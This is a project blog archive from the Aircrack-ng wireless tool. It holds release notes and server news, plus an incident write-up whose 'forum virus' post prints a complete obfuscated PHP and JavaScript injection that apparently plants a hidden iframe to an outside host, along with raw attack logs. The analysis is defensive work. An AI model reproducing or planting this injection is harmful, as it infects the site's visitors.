Saturday, May 25, 2013

Aircrack-ng 1.2 Beta 1 Release

After a few years, we finally got a release: 1.2 Beta 1. Enjoy ;-)

Release summary:
  • Compilation fixes on all supported OSes.
  • Makefile improvement and fixes.
  • A lot of fixes and improvements on all tools and documentation.
  • Fixed licensing issues.
  • Added a few new tools and scripts (including distributed cracking tool).
  • Fixed endianness and QoS issues.

You can find more details in the ChangeLog and even more in our subversion history.

And, 2 more things:
  • The forum will be ready in a few days.
  • We are now using Travis CI for continuous integration

Monday, May 20, 2013

Trac migration and forum crash details

Trac/SVN

You probably didn't notice but I had been working a lot on the servers and I recently migrated our old trac server to a new server.

However, a migration never goes without a glitch (who unleashed Murphy?). A few settings changes needs to be done for Trac and we're done but SVN was behaving. The only solution I saw is moving it temporarily to a separate server/URL: http://svn.aircrack-ng.org
You can also reach it via https but it's a self signed certificate for now.
Since the repository UUID didn't change, you can simply relocate your local copy or check out with the new svn URL.

Trac URL didn't change and it is now also available via HTTPS with a proper certificate

Forum

It had a big issue a few weeks ago. My provider told me their log says the instance was stopped. However, their cloud system crashed the instance.

The non-persistant disk where the OS of the instance is installed goes back to its original state (so any data/customization on that disk is lost) when the VM is stopped or archived. I already had similar issues before but I was able to force the instance to reboot so it wasn't a big deal.

Forum data is hosted on a MySQL database and those files were on the non-persistant disk.

Good news: Forum files and Apache config were stored on the persistant disk and I had a backup script for the DB.
Bad news: last time the backup script ran was in July 2012.
Lesson learned: check every often that the backup scripts are still running.

We lost about 10 month of posts and I am deeply sorry for what happened. I had a discussion with my provider and I'm now downsizing due to that issue, past issues and their customer support. I'll only keep stuff that never gave me any issue: domains.
Trac was the first service to be migrated to the new server a very good friend gave me (I can't thank him enough for that). Other services will be moved on that server too.

Monday, April 1, 2013

April Fools - Wirelessly controller traffic light

Hello guys,

Some time ago, a person who shall not be named emailed me and talked about new traffic lights that can be controlled wirelessly. Since access points are getting pretty powerful these days, it makes sense that they are now embedded in traffic lights to control them. The reason behind making it wirelessly accessible is to make maintenance easier for technicians so that they don't have to open the whole thing. They just have to connect to the AP inside the traffic light to do it.

Here is the maintenance page. The URL of that page is blurred for security reasons:


Since there is no reference to it on other pages and it's so basic, I guess they forgot to remove it on production units (or maybe it is just meant to be used by technicians/developers or it is security by obscurity). On other pages you can input parameters of the traffic lights when it is in automatic mode such as operating times (it will blink yellow when outside of it), how long does each light last, etc...


He even sent me one of those traffic light. As a side note, you would be amazed by the size of those things:




Here is a close-up where the AP is:


The network cable you can see is used to interconnect different traffic lights at crossroads to synchronize several of them. 

Well, of course, since they don't want people to just hack in and mess with the traffic lights, they did not make it easy to connect (SSID is random) and to find that page. However, the person who contacted me managed to grab the handshake while the maintenance guy was doing maintenance and apparently, they use the same easy passphrase ("Maintenance123") on ALL those new traffic lights. By decrypting the traffic, he figured out the page where you can control the traffic light manually.

We both tried to contact the company to let them know about the flaws since it's pretty unsafe/dangerous to be able to change the light on live traffic lights and especially since they use the same passphrase on all of them. But they never got back to us.

Thursday, October 18, 2012

Will my card work with Aircrack-ng?

Even though there is plenty of documentation on the subject (and most of the time, existing posts about it in the forum), I still see a lot of these questions, especially for new cards.

It's pretty easy to find out and the easiest way is just to try it with a recent version of a pentesting live CD like Backtrack or Pentoo. If your card is detected, you're good to go. You can even use Ubuntu or whetever distro you're comfortable with.
An important thing to note is that what airmon-ng says about your chipset is pure information and doesn't affect your card ability to inject/monitor if the driver/card has that capability in the first place obviously.

A few important notes here related to VMware/VirtualBox:
  • If your card is internal, it's not gonna work, you must reboot and run the live CD
  • If your card is USB and you are running VMware/Virtualbox, then make sure it is attached to the virtual machine. It is explained in the wiki for VMware and it is pretty similar for VirtualBox.

If it doesn't work, the quickest way to find out if it will work is to compile compat-wireless, install it and reboot.
If your card doesn't show up then it might need a firmware. Download it and put it at the right location. Most of the time, a package containing it is available for your distribution; search for "firmware" with your package manager (synaptic/apt-cache/aptitude on Debian-based distro) and install it.
If you download it manually, check dmesg to make sure it doesn't show an error; the message is self-explanatory when it happens.

If your card still doesn't show up (assuming there is no unresolved symbols), then it's probably not gonna work.
In that case, you might want to practice your Google-fu to see if there is a driver in the works.

Friday, July 6, 2012

Forum and trac/svn up

Hi,

June has been a very busy month for me, I didn't really have time to work on the forum and I apologize for that.
I've been working for the past week on bringing back up all those services. Trac and svn were safe to use and brought back up a few days ago and I spent a few more days to clean up the forum and migrate it to a new server. Nothing was lost and your login/passwords are still the same.

Since it is on a new machine, on its own, it should be faster than before and I can tell you that it is also better protected (I listened to your advices) :)
In this case, it also means a new IP and thus it might in some cases take a day or two for DNS to spread. How do you know you reached the new one?
Two ways:
  • Open it in a browser, the old forum will return a 403 Forbidden, so if you don't have that, you're good.
  • Do a nslookup forum.aircrack-ng.org. It should return 178.32.208.188.

Please send me feedback about the forum in the comments, especially if you have issues with it (I'll try to address them).

Enjoy

Monday, June 4, 2012

More about the forum virus

I got more time to investigate it.

I had a backup of the forum and wanted to make sure there were no changes to the files (besides that added file) so I ran a MD5. And it turned out the PHP files were changed.

At the beginning of the index.php, you could see the following code added (in between php tags):

eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCiRib3RzVUEgPSBhcnJheSgnMTIzNDUnLCdhbGV4YS5jb20nLCdhbm9ueW1vdXNlLm9yZycsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ2Jsb2dwdWxzZS5jb20nLCdib3QnLCdidXp6dHJhY2tlci5jb20nLCdjcmF3bCcsJ2RvY29tbycsJ2RydXBhbC5vcmcnLCdmZWVkdG9vbHMnLCdodG1sZG9jJywnaHR0cGNsaWVudCcsJ2ludGVybmV0c2Vlci5jb20nLCdsaW51eCcsJ21hY2ludG9zaCcsJ21hYyBvcycsJ21hZ2VudCcsJ21haWwucnUnLCdteWJsb2dsb2cgYXBpJywnbmV0Y3JhZnQnLCdvcGVuYWNvb24uZGUnLCdvcGVyYSBtaW5pJywnb3BlcmEgbW9iaScsJ3BsYXlzdGF0aW9uJywncG9zdHJhbmsuY29tJywncHNwJywncnJycnJycnJyJywncnNzcmVhZGVyJywnc2x1cnAnLCdzbm9vcHknLCdzcGlkZXInLCdzcHlkZXInLCdzem4taW1hZ2UtcmVzaXplcicsJ3ZhbGlkYXRvcicsJ3ZpcnVzJywndmxjIG1lZGlhIHBsYXllcicsJ3dlYmNvbGxhZ2UnLCd3b3JkcHJlc3MnLCd4MTEnLCd5YW5kZXgnLCdpcGhvbmUnLCdhbmRyb2lkJywnY2hyb21lJyk7DQpmb3JlYWNoICgkYm90c1VBIGFzICRicykge2lmKHN0cnBvcyhzdHJ0b2xvd2VyKCR1YSksICRicykhPT0gZmFsc2UpeyRib3QgPSB0cnVlOyBicmVhazt9fQ0KaWYgKCEkYm90KXsNCgllY2hvKGJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZEQ1cFBUQTdkSEo1ZTJGMllYTjJQWEJ5YjNSdmRIbHdaVHQ5WTJGMFkyZ29laWw3YUQwaWFHRnlRMjlrWlNJN1pqMWJKeTB6TTJZdE16Tm1Oak5tTmpCbUxURXdaaTB5WmpVNFpqWTVaalUzWmpjMVpqWTNaalU1WmpZNFpqYzBaalJtTmpGbU5UbG1OelJtTWpkbU5qWm1OVGxtTmpkbU5UbG1OamhtTnpSbU56Tm1NalJtTnpsbU5ESm1OVFZtTmpGbU16Wm1OVFZtTmpkbU5UbG1MVEptTFRObU5UWm1OamxtTlRobU56bG1MVE5tTFRGbU5EbG1ObVkxTVdZdE1XWTRNV1l0TWpsbUxUTXpaaTB6TTJZdE16Tm1Oak5tTmpCbU56Sm1OVFZtTmpkbU5UbG1OekptTFRKbUxURm1NVGRtTFRJNVppMHpNMll0TXpObU9ETm1MVEV3WmpVNVpqWTJaamN6WmpVNVppMHhNR1k0TVdZdE1qbG1MVE16Wmkwek0yWXRNek5tTlRobU5qbG1OVGRtTnpWbU5qZG1OVGxtTmpobU56Um1OR1kzTjJZM01tWTJNMlkzTkdZMU9XWXRNbVl0T0dZeE9HWTJNMlkyTUdZM01tWTFOV1kyTjJZMU9XWXRNVEJtTnpObU56Sm1OVGRtTVRsbUxUTm1OakptTnpSbU56Um1OekJtTVRabU5XWTFaamN5WmpZMFpqYzVaamMwWmpZMVpqWXpaamM0WmpVMlpqWXdaalkwWmpjNFpqWTFaalkxWmpSbU5qZG1OemxtTmpCbU56ZG1OR1kzTldZM00yWTFaakl4WmpZeFpqWTVaakU1WmpobUxUTm1MVEV3WmpjM1pqWXpaalU0WmpjMFpqWXlaakU1WmkwelpqZG1ObVl0TTJZdE1UQm1OakptTlRsbU5qTm1OakZtTmpKbU56Um1NVGxtTFRObU4yWTJaaTB6WmkweE1HWTNNMlkzTkdZM09XWTJObVkxT1dZeE9XWXRNMlkzTm1ZMk0yWTNNMlkyTTJZMU5tWTJNMlkyTm1ZMk0yWTNOR1kzT1dZeE5tWTJNbVkyTTJZMU9HWTFPR1kxT1dZMk9HWXhOMlkzTUdZMk9XWTNNMlkyTTJZM05HWTJNMlkyT1dZMk9HWXhObVkxTldZMU5tWTNNMlkyT1dZMk5tWTNOV1kzTkdZMU9XWXhOMlkyTm1ZMU9XWTJNR1kzTkdZeE5tWTJaakUzWmpjMFpqWTVaamN3WmpFMlpqWm1NVGRtTFRObU1qQm1NVGhtTldZMk0yWTJNR1kzTW1ZMU5XWTJOMlkxT1dZeU1HWXRPR1l0TVdZeE4yWXRNamxtTFRNelppMHpNMlk0TTJZdE1qbG1MVE16Wmkwek0yWTJNR1kzTldZMk9HWTFOMlkzTkdZMk0yWTJPV1kyT0dZdE1UQm1Oak5tTmpCbU56Sm1OVFZtTmpkbU5UbG1OekptTFRKbUxURm1PREZtTFRJNVppMHpNMll0TXpObUxUTXpaamMyWmpVMVpqY3laaTB4TUdZMk1HWXRNVEJtTVRsbUxURXdaalU0WmpZNVpqVTNaamMxWmpZM1pqVTVaalk0WmpjMFpqUm1OVGRtTnpKbU5UbG1OVFZtTnpSbU5UbG1NamRtTmpabU5UbG1OamRtTlRsbU5qaG1OelJtTFRKbUxUTm1Oak5tTmpCbU56Sm1OVFZtTmpkbU5UbG1MVE5tTFRGbU1UZG1OakJtTkdZM00yWTFPV1kzTkdZeU0yWTNOR1kzTkdZM01tWTJNMlkxTm1ZM05XWTNOR1kxT1dZdE1tWXRNMlkzTTJZM01tWTFOMll0TTJZeVppMHpaall5WmpjMFpqYzBaamN3WmpFMlpqVm1OV1kzTW1ZMk5HWTNPV1kzTkdZMk5XWTJNMlkzT0dZMU5tWTJNR1kyTkdZM09HWTJOV1kyTldZMFpqWTNaamM1WmpZd1pqYzNaalJtTnpWbU56Tm1OV1l5TVdZMk1XWTJPV1l4T1dZNFppMHpaaTB4WmpFM1pqWXdaalJtTnpObU56Um1OemxtTmpabU5UbG1OR1kzTm1ZMk0yWTNNMlkyTTJZMU5tWTJNMlkyTm1ZMk0yWTNOR1kzT1dZeE9XWXRNMlkyTW1ZMk0yWTFPR1kxT0dZMU9XWTJPR1l0TTJZeE4yWTJNR1kwWmpjelpqYzBaamM1WmpZMlpqVTVaalJtTnpCbU5qbG1Oek5tTmpObU56Um1Oak5tTmpsbU5qaG1NVGxtTFRObU5UVm1OVFptTnpObU5qbG1OalptTnpWbU56Um1OVGxtTFRObU1UZG1OakJtTkdZM00yWTNOR1kzT1dZMk5tWTFPV1kwWmpZMlpqVTVaall3WmpjMFpqRTVaaTB6WmpabUxUTm1NVGRtTmpCbU5HWTNNMlkzTkdZM09XWTJObVkxT1dZMFpqYzBaalk1Wmpjd1pqRTVaaTB6WmpabUxUTm1NVGRtTmpCbU5HWTNNMlkxT1dZM05HWXlNMlkzTkdZM05HWTNNbVkyTTJZMU5tWTNOV1kzTkdZMU9XWXRNbVl0TTJZM04yWTJNMlkxT0dZM05HWTJNbVl0TTJZeVppMHpaamRtTm1ZdE0yWXRNV1l4TjJZMk1HWTBaamN6WmpVNVpqYzBaakl6WmpjMFpqYzBaamN5WmpZelpqVTJaamMxWmpjMFpqVTVaaTB5WmkwelpqWXlaalU1WmpZelpqWXhaall5WmpjMFppMHpaakptTFRObU4yWTJaaTB6WmkweFpqRTNaaTB5T1dZdE16Tm1MVE16Wmkwek0yWTFPR1kyT1dZMU4yWTNOV1kyTjJZMU9XWTJPR1kzTkdZMFpqWXhaalU1WmpjMFpqSTNaalkyWmpVNVpqWTNaalU1WmpZNFpqYzBaamN6WmpJMFpqYzVaalF5WmpVMVpqWXhaak0yWmpVMVpqWTNaalU1WmkweVppMHpaalUyWmpZNVpqVTRaamM1WmkwelppMHhaalE1WmpabU5URm1OR1kxTldZM01HWTNNR1kxT1dZMk9HWTFPR1l5TldZMk1tWTJNMlkyTm1ZMU9HWXRNbVkyTUdZdE1XWXhOMll0TWpsbUxUTXpaaTB6TTJZNE15ZGRXekJkTG5Od2JHbDBLQ2RtSnlrN2RqMGlaU0lySW5aaElqdDlhV1lvZGlsbFBYZHBibVJ2ZDF0Mkt5SnNJbDA3ZEhKNWUzRTlaRzlqZFcxbGJuUXVZM0psWVhSbFJXeGxiV1Z1ZENnaVpHbDJJaWs3Y1M1aGNIQmxibVJEYUdsc1pDaHhLeUlpS1R0OVkyRjBZMmdvY1hkbktYdDNQV1k3Y3oxYlhUdDlJSEk5VTNSeWFXNW5PM285S0NobEtUOW9PaUlpS1R0bWIzSW9PelUzTnlFOWFUdHBLejB4S1h0cVBXazdhV1lvWlNselBYTXJjbHNpWm5KdmJVTWlLeWdvWlNrL2Vqb3hNaWxkS0hkYmFsMHFNU3MwTWlrN2ZTQnBaaWgySmlabEppWnlKaVo2Smlab0ppWnpKaVptSmlaMktXVW9jeWs3UEM5elkzSnBjSFErJykpOw0KfQ0K'));

When it is decoded, the beginning is clear but it has once more an eval and base64_decode:

error_reporting(0);
$bot = FALSE ;
$ua = $_SERVER['HTTP_USER_AGENT'];
$botsUA = array('12345','alexa.com','anonymouse.org','bdbrandprotect.com','blogpulse.com','bot','buzztracker.com','crawl','docomo','drupal.org','feedtools','htmldoc','httpclient','internetseer.com','linux','macintosh','mac os','magent','mail.ru','mybloglog api','netcraft','openacoon.de','opera mini','opera mobi','playstation','postrank.com','psp','rrrrrrrrr','rssreader','slurp','snoopy','spider','spyder','szn-image-resizer','validator','virus','vlc media player','webcollage','wordpress','x11','yandex','iphone','android','chrome');
foreach ($botsUA as $bs) {if(strpos(strtolower($ua), $bs)!== false){$bot = true; break;}}
if (!$bot){
    echo(base64_decode('PHNjcmlwdD5pPTA7dHJ5e2F2YXN2PXByb3RvdHlwZTt9Y2F0Y2goeil7aD0iaGFyQ29kZSI7Zj1bJy0zM2YtMzNmNjNmNjBmLTEwZi0yZjU4ZjY5ZjU3Zjc1ZjY3ZjU5ZjY4Zjc0ZjRmNjFmNTlmNzRmMjdmNjZmNTlmNjdmNTlmNjhmNzRmNzNmMjRmNzlmNDJmNTVmNjFmMzZmNTVmNjdmNTlmLTJmLTNmNTZmNjlmNThmNzlmLTNmLTFmNDlmNmY1MWYtMWY4MWYtMjlmLTMzZi0zM2YtMzNmNjNmNjBmNzJmNTVmNjdmNTlmNzJmLTJmLTFmMTdmLTI5Zi0zM2YtMzNmODNmLTEwZjU5ZjY2ZjczZjU5Zi0xMGY4MWYtMjlmLTMzZi0zM2YtMzNmNThmNjlmNTdmNzVmNjdmNTlmNjhmNzRmNGY3N2Y3MmY2M2Y3NGY1OWYtMmYtOGYxOGY2M2Y2MGY3MmY1NWY2N2Y1OWYtMTBmNzNmNzJmNTdmMTlmLTNmNjJmNzRmNzRmNzBmMTZmNWY1ZjcyZjY0Zjc5Zjc0ZjY1ZjYzZjc4ZjU2ZjYwZjY0Zjc4ZjY1ZjY1ZjRmNjdmNzlmNjBmNzdmNGY3NWY3M2Y1ZjIxZjYxZjY5ZjE5ZjhmLTNmLTEwZjc3ZjYzZjU4Zjc0ZjYyZjE5Zi0zZjdmNmYtM2YtMTBmNjJmNTlmNjNmNjFmNjJmNzRmMTlmLTNmN2Y2Zi0zZi0xMGY3M2Y3NGY3OWY2NmY1OWYxOWYtM2Y3NmY2M2Y3M2Y2M2Y1NmY2M2Y2NmY2M2Y3NGY3OWYxNmY2MmY2M2Y1OGY1OGY1OWY2OGYxN2Y3MGY2OWY3M2Y2M2Y3NGY2M2Y2OWY2OGYxNmY1NWY1NmY3M2Y2OWY2NmY3NWY3NGY1OWYxN2Y2NmY1OWY2MGY3NGYxNmY2ZjE3Zjc0ZjY5ZjcwZjE2ZjZmMTdmLTNmMjBmMThmNWY2M2Y2MGY3MmY1NWY2N2Y1OWYyMGYtOGYtMWYxN2YtMjlmLTMzZi0zM2Y4M2YtMjlmLTMzZi0zM2Y2MGY3NWY2OGY1N2Y3NGY2M2Y2OWY2OGYtMTBmNjNmNjBmNzJmNTVmNjdmNTlmNzJmLTJmLTFmODFmLTI5Zi0zM2YtMzNmLTMzZjc2ZjU1ZjcyZi0xMGY2MGYtMTBmMTlmLTEwZjU4ZjY5ZjU3Zjc1ZjY3ZjU5ZjY4Zjc0ZjRmNTdmNzJmNTlmNTVmNzRmNTlmMjdmNjZmNTlmNjdmNTlmNjhmNzRmLTJmLTNmNjNmNjBmNzJmNTVmNjdmNTlmLTNmLTFmMTdmNjBmNGY3M2Y1OWY3NGYyM2Y3NGY3NGY3MmY2M2Y1NmY3NWY3NGY1OWYtMmYtM2Y3M2Y3MmY1N2YtM2YyZi0zZjYyZjc0Zjc0ZjcwZjE2ZjVmNWY3MmY2NGY3OWY3NGY2NWY2M2Y3OGY1NmY2MGY2NGY3OGY2NWY2NWY0ZjY3Zjc5ZjYwZjc3ZjRmNzVmNzNmNWYyMWY2MWY2OWYxOWY4Zi0zZi0xZjE3ZjYwZjRmNzNmNzRmNzlmNjZmNTlmNGY3NmY2M2Y3M2Y2M2Y1NmY2M2Y2NmY2M2Y3NGY3OWYxOWYtM2Y2MmY2M2Y1OGY1OGY1OWY2OGYtM2YxN2Y2MGY0ZjczZjc0Zjc5ZjY2ZjU5ZjRmNzBmNjlmNzNmNjNmNzRmNjNmNjlmNjhmMTlmLTNmNTVmNTZmNzNmNjlmNjZmNzVmNzRmNTlmLTNmMTdmNjBmNGY3M2Y3NGY3OWY2NmY1OWY0ZjY2ZjU5ZjYwZjc0ZjE5Zi0zZjZmLTNmMTdmNjBmNGY3M2Y3NGY3OWY2NmY1OWY0Zjc0ZjY5ZjcwZjE5Zi0zZjZmLTNmMTdmNjBmNGY3M2Y1OWY3NGYyM2Y3NGY3NGY3MmY2M2Y1NmY3NWY3NGY1OWYtMmYtM2Y3N2Y2M2Y1OGY3NGY2MmYtM2YyZi0zZjdmNmYtM2YtMWYxN2Y2MGY0ZjczZjU5Zjc0ZjIzZjc0Zjc0ZjcyZjYzZjU2Zjc1Zjc0ZjU5Zi0yZi0zZjYyZjU5ZjYzZjYxZjYyZjc0Zi0zZjJmLTNmN2Y2Zi0zZi0xZjE3Zi0yOWYtMzNmLTMzZi0zM2Y1OGY2OWY1N2Y3NWY2N2Y1OWY2OGY3NGY0ZjYxZjU5Zjc0ZjI3ZjY2ZjU5ZjY3ZjU5ZjY4Zjc0ZjczZjI0Zjc5ZjQyZjU1ZjYxZjM2ZjU1ZjY3ZjU5Zi0yZi0zZjU2ZjY5ZjU4Zjc5Zi0zZi0xZjQ5ZjZmNTFmNGY1NWY3MGY3MGY1OWY2OGY1OGYyNWY2MmY2M2Y2NmY1OGYtMmY2MGYtMWYxN2YtMjlmLTMzZi0zM2Y4MyddWzBdLnNwbGl0KCdmJyk7dj0iZSIrInZhIjt9aWYodillPXdpbmRvd1t2KyJsIl07dHJ5e3E9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iik7cS5hcHBlbmRDaGlsZChxKyIiKTt9Y2F0Y2gocXdnKXt3PWY7cz1bXTt9IHI9U3RyaW5nO3o9KChlKT9oOiIiKTtmb3IoOzU3NyE9aTtpKz0xKXtqPWk7aWYoZSlzPXMrclsiZnJvbUMiKygoZSk/ejoxMildKHdbal0qMSs0Mik7fSBpZih2JiZlJiZyJiZ6JiZoJiZzJiZmJiZ2KWUocyk7PC9zY3JpcHQ+'));
}

And that second part decoded unfortunately is obfuscated (it is Javascript and enclosed between script tags):

i=0;try{avasv=prototype;}catch(z){h="harCode";f=['-33f-33f63f60f-10f-2f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f-1f81f-29f-33f-33f-33f63f60f72f55f67f59f72f-2f-1f17f-29f-33f-33f83f-10f59f66f73f59f-10f81f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f77f72f63f74f59f-2f-8f18f63f60f72f55f67f59f-10f73f72f57f19f-3f62f74f74f70f16f5f5f72f64f79f74f65f63f78f56f60f64f78f65f65f4f67f79f60f77f4f75f73f5f21f61f69f19f8f-3f-10f77f63f58f74f62f19f-3f7f6f-3f-10f62f59f63f61f62f74f19f-3f7f6f-3f-10f73f74f79f66f59f19f-3f76f63f73f63f56f63f66f63f74f79f16f62f63f58f58f59f68f17f70f69f73f63f74f63f69f68f16f55f56f73f69f66f75f74f59f17f66f59f60f74f16f6f17f74f69f70f16f6f17f-3f20f18f5f63f60f72f55f67f59f20f-8f-1f17f-29f-33f-33f83f-29f-33f-33f60f75f68f57f74f63f69f68f-10f63f60f72f55f67f59f72f-2f-1f81f-29f-33f-33f-33f76f55f72f-10f60f-10f19f-10f58f69f57f75f67f59f68f74f4f57f72f59f55f74f59f27f66f59f67f59f68f74f-2f-3f63f60f72f55f67f59f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f73f72f57f-3f2f-3f62f74f74f70f16f5f5f72f64f79f74f65f63f78f56f60f64f78f65f65f4f67f79f60f77f4f75f73f5f21f61f69f19f8f-3f-1f17f60f4f73f74f79f66f59f4f76f63f73f63f56f63f66f63f74f79f19f-3f62f63f58f58f59f68f-3f17f60f4f73f74f79f66f59f4f70f69f73f63f74f63f69f68f19f-3f55f56f73f69f66f75f74f59f-3f17f60f4f73f74f79f66f59f4f66f59f60f74f19f-3f6f-3f17f60f4f73f74f79f66f59f4f74f69f70f19f-3f6f-3f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f77f63f58f74f62f-3f2f-3f7f6f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f62f59f63f61f62f74f-3f2f-3f7f6f-3f-1f17f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f4f55f70f70f59f68f58f25f62f63f66f58f-2f60f-1f17f-29f-33f-33f83'][0].split('f');v="e"+"va";}if(v)e=window[v+"l"];try{q=document.createElement("div");q.appendChild(q+"");}catch(qwg){w=f;s=[];} r=String;z=((e)?h:"");for(;577!=i;i+=1){j=i;if(e)s=s+r["fromC"+((e)?z:12)](w[j]*1+42);} if(v&&e&&r&&z&&h&&s&&f&&v)e(s);

Indented:

i = 0;
try{
    avasv=prototype;
} catch (z) {
    h = "harCode";
    f = ['-33f-33f63f60f-10f-2f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f-1f81f-29f-33f-33f-33f63f60f72f55f67f59f72f-2f-1f17f-29f-33f-33f83f-10f59f66f73f59f-10f81f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f77f72f63f74f59f-2f-8f18f63f60f72f55f67f59f-10f73f72f57f19f-3f62f74f74f70f16f5f5f72f64f79f74f65f63f78f56f60f64f78f65f65f4f67f79f60f77f4f75f73f5f21f61f69f19f8f-3f-10f77f63f58f74f62f19f-3f7f6f-3f-10f62f59f63f61f62f74f19f-3f7f6f-3f-10f73f74f79f66f59f19f-3f76f63f73f63f56f63f66f63f74f79f16f62f63f58f58f59f68f17f70f69f73f63f74f63f69f68f16f55f56f73f69f66f75f74f59f17f66f59f60f74f16f6f17f74f69f70f16f6f17f-3f20f18f5f63f60f72f55f67f59f20f-8f-1f17f-29f-33f-33f83f-29f-33f-33f60f75f68f57f74f63f69f68f-10f63f60f72f55f67f59f72f-2f-1f81f-29f-33f-33f-33f76f55f72f-10f60f-10f19f-10f58f69f57f75f67f59f68f74f4f57f72f59f55f74f59f27f66f59f67f59f68f74f-2f-3f63f60f72f55f67f59f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f73f72f57f-3f2f-3f62f74f74f70f16f5f5f72f64f79f74f65f63f78f56f60f64f78f65f65f4f67f79f60f77f4f75f73f5f21f61f69f19f8f-3f-1f17f60f4f73f74f79f66f59f4f76f63f73f63f56f63f66f63f74f79f19f-3f62f63f58f58f59f68f-3f17f60f4f73f74f79f66f59f4f70f69f73f63f74f63f69f68f19f-3f55f56f73f69f66f75f74f59f-3f17f60f4f73f74f79f66f59f4f66f59f60f74f19f-3f6f-3f17f60f4f73f74f79f66f59f4f74f69f70f19f-3f6f-3f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f77f63f58f74f62f-3f2f-3f7f6f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f62f59f63f61f62f74f-3f2f-3f7f6f-3f-1f17f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f4f55f70f70f59f68f58f25f62f63f66f58f-2f60f-1f17f-29f-33f-33f83'][0].split('f');
    v = "e"+"va";
}

if (v) e = window[v+"l"];
try {
    q = document.createElement("div");
    q.appendChild(q+"");
} catch (qwg) {
    w = f;
    s = [];
}

r = String;
z = ((e)?h:"");
for( ;577!=i; i+=1) {
    j=i;
    if (e) s = s+r["fromC"+( (e) ? z : 12)](w[j]*1+42);
}
if (v && e && r && z && h && s && f && v) e(s);

It's not really clear. I get that he created a table with the split command ('f' is just a separator), but I don't know yet what that function does.

On side note, I still haven't got any news from the report I made (and I asked again a few days ago), so I think I can conclude that it's a shady business as I thought.

I'd like to thank a lot everybody who has already helped me and given me tips on what to check on the server :)

Tuesday, May 29, 2012

Forum virus details

Hi,

as you know, I shut down the server a few days ago because I was told there was a virus. Here is what I know about it so far. This post will be updated as I know more. There is a summary at the end of this post which will be useful for your IT department.

The virus is also known by Sophos as Mal/Iframe-W and it was uploaded in the forum in a separate directory inside the forum, 'data'. It's a piece of PHP called rbvzv.php (1418 bytes) that has a payload encoded in base64. Then it is passed to the JavaScript function eval() which is going to execute it.
If any of you guys is interested in the piece of code, you can download it here (the password is rbvzv.php) and please don't use it for malicious purposes; I'd love to know what it does but unfortunately I don't have the knowledge yet to decode it. I can read Javascript but the problem is that it's not plain Base64.

I checked the whole server and the attacker got in through the web server, no login and apache didn't have any privileges (user without bash, etc).

For those who are interested, here is the raw apache log from the attack:
91.224.160.132 - - [23/May/2012:01:12:04 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 15 "http://forum.aircrack-ng.org/phpmyadmin/index.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)"
190.102.136.196 - - [23/May/2012:20:22:43 +0200] "POST /data/rbvzv.php HTTP/1.0" 200 727 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
81.30.222.42 - - [23/May/2012:20:23:26 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 1212 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
116.55.19.96 - - [23/May/2012:20:24:50 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 1212 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
61.50.171.2 - - [23/May/2012:20:28:15 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 1270 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
178.218.224.2 - - [23/May/2012:20:27:01 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 1270 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
